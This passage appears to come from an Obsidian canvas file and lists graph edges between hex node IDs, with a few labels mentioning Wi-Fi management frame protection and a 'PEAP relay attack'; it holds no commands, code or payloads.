		{"id":"6e2be20f5ba76d45","fromNode":"dadee9e8ed52a2cd","fromSide":"right","toNode":"178079b7a8b36ae2","toSide":"left"},
		{"id":"1bc897bc333d293b","fromNode":"dadee9e8ed52a2cd","fromSide":"right","toNode":"582decafbfab0338","toSide":"left"},
		{"id":"04fdfda80121a954","fromNode":"42770b478eee6d9f","fromSide":"bottom","toNode":"3cd5f9f38706d5fa","toSide":"top"},
		{"id":"4aa01931274534cb","fromNode":"582decafbfab0338","fromSide":"right","toNode":"63f21e171c591b78","toSide":"left"},
		{"id":"e7ea932375ac1c5f","fromNode":"3cd5f9f38706d5fa","fromSide":"right","toNode":"e2cdfb4dc2d02ebf","toSide":"left"},
		{"id":"f4a8371bf25bf947","fromNode":"28376536ee85fda7","fromSide":"bottom","toNode":"0f044b652072fca6","toSide":"top"},
		{"id":"e808b024aa96a8f6","fromNode":"28376536ee85fda7","fromSide":"bottom","toNode":"eb692c79dc603993","toSide":"top"},
		{"id":"d775e36463a4f1cd","fromNode":"ea45672fd9c4a50d","fromSide":"bottom","toNode":"28376536ee85fda7","toSide":"top"},
		{"id":"28569ce608ec81c7","fromNode":"2daa29b56811cbf5","fromSide":"right","toNode":"70de4a62fde6c199","toSide":"left"},
		{"id":"8c37350a99fcd893","fromNode":"dadee9e8ed52a2cd","fromSide":"right","toNode":"c786083b385edfc8","toSide":"left"},
		{"id":"2d7d2e0824ce89be","fromNode":"c3dbc02811a47de7","fromSide":"top","toNode":"5ed3ed64a4092e98","toSide":"bottom"},
		{"id":"02facedd7686c9b8","fromNode":"c3dbc02811a47de7","fromSide":"bottom","toNode":"178079b7a8b36ae2","toSide":"top"},
		{"id":"78d1f62d0ebefc47","fromNode":"ca81c743ee07eb7b","fromSide":"right","toNode":"2a9b7a88933ae641","toSide":"left"},
		{"id":"b8b68a0fac1f4461","fromNode":"8c7cdddc82f0b86e","fromSide":"right","toNode":"ca81c743ee07eb7b","toSide":"left","label":"NO\nMFP is enabled\n"},
		{"id":"dc6dbc9b96f43009","fromNode":"8c7cdddc82f0b86e","fromSide":"right","toNode":"b68ad5aa335e185c","toSide":"left","label":"YES is 0\nMFP is disabled\n"},
		{"id":"67f2bcaeb832c277","fromNode":"178079b7a8b36ae2","fromSide":"right","toNode":"8c7cdddc82f0b86e","toSide":"left"},
		{"id":"600cacceb503c796","fromNode":"b68ad5aa335e185c","fromSide":"top","toNode":"63f73034f8a1fd8d","toSide":"bottom"},
		{"id":"b66b3bdf80368c01","fromNode":"bfe837fcea9ced47","fromSide":"bottom","toNode":"b6b19e5025eae4fe","toSide":"top"},
		{"id":"25d335158c81e417","fromNode":"63f21e171c591b78","fromSide":"right","toNode":"eb47191c6eac91a8","toSide":"left"},
		{"id":"1400c8dcb6cf4525","fromNode":"e6a926e28a875ca1","fromSide":"right","toNode":"aca48360764a1a57","toSide":"left"},
		{"id":"135582cecc0758e4","fromNode":"aca48360764a1a57","fromSide":"right","toNode":"31993a70d9f851d0","toSide":"left"},
		{"id":"d48ca07c07f44cd7","fromNode":"63f21e171c591b78","fromSide":"right","toNode":"d8e2b6a0ec1f975a","toSide":"left"},
		{"id":"1add33eccdbf08fa","fromNode":"eb47191c6eac91a8","fromSide":"right","toNode":"e6a926e28a875ca1","toSide":"left"},
		{"id":"2ec6f7e9c4f67c8d","fromNode":"d8e2b6a0ec1f975a","fromSide":"right","toNode":"6d91ba6e247c85bf","toSide":"left"},
		{"id":"1ac8a6c77b40f743","fromNode":"d8e2b6a0ec1f975a","fromSide":"right","toNode":"b7df53a1b0e86d8a","toSide":"left"},
		{"id":"b1bbcfb63535ffcd","fromNode":"4c7115f279b06b62","fromSide":"right","toNode":"4eaecb00c8412d72","toSide":"left"},
		{"id":"a8f29eedff613664","fromNode":"31993a70d9f851d0","fromSide":"bottom","toNode":"4c7115f279b06b62","toSide":"top"},
		{"id":"97aac21822012d1f","fromNode":"6d91ba6e247c85bf","fromSide":"right","toNode":"4c7115f279b06b62","toSide":"left"},
		{"id":"b8c4de1b388a6ac0","fromNode":"b7df53a1b0e86d8a","fromSide":"right","toNode":"4c7115f279b06b62","toSide":"left"},
		{"id":"14a1481af02852b7","fromNode":"42770b478eee6d9f","fromSide":"top","toNode":"582decafbfab0338","toSide":"bottom"},
		{"id":"312bc8277b4bfd36","fromNode":"2a9b7a88933ae641","fromSide":"right","toNode":"65b0de075cfb5a0e","toSide":"left"},
		{"id":"5df8fcdf0faab208","fromNode":"63f21e171c591b78","fromSide":"right","toNode":"d1485d56b78f29ff","toSide":"left"},
		{"id":"430d5f15de1ca7ce","fromNode":"d1485d56b78f29ff","fromSide":"right","toNode":"13231b08bcc57c7f","toSide":"left"},
		{"id":"21eb7fe76ca4ba8b","fromNode":"13231b08bcc57c7f","fromSide":"right","toNode":"a55d8f8c51d14fe4","toSide":"left"},
		{"id":"8656fb2ef5164db5","fromNode":"a55d8f8c51d14fe4","fromSide":"right","toNode":"f6013d9c5abcf499","toSide":"left"},
		{"id":"539113571aba6e56","fromNode":"f6013d9c5abcf499","fromSide":"right","toNode":"976c518b49960809","toSide":"left"},
		{"id":"df23dfe469160253","fromNode":"6e2a1138736f8c98","fromSide":"right","toNode":"3d8ac28a756c0791","toSide":"left"},
		{"id":"7dda75fa1a93bb73","fromNode":"3d8ac28a756c0791","fromSide":"right","toNode":"bca1409d00d49714","toSide":"left"},
		{"id":"4338bc8443633356","fromNode":"d1485d56b78f29ff","fromSide":"right","toNode":"6e2a1138736f8c98","toSide":"left","label":"PEAP relay attack"}
	]
}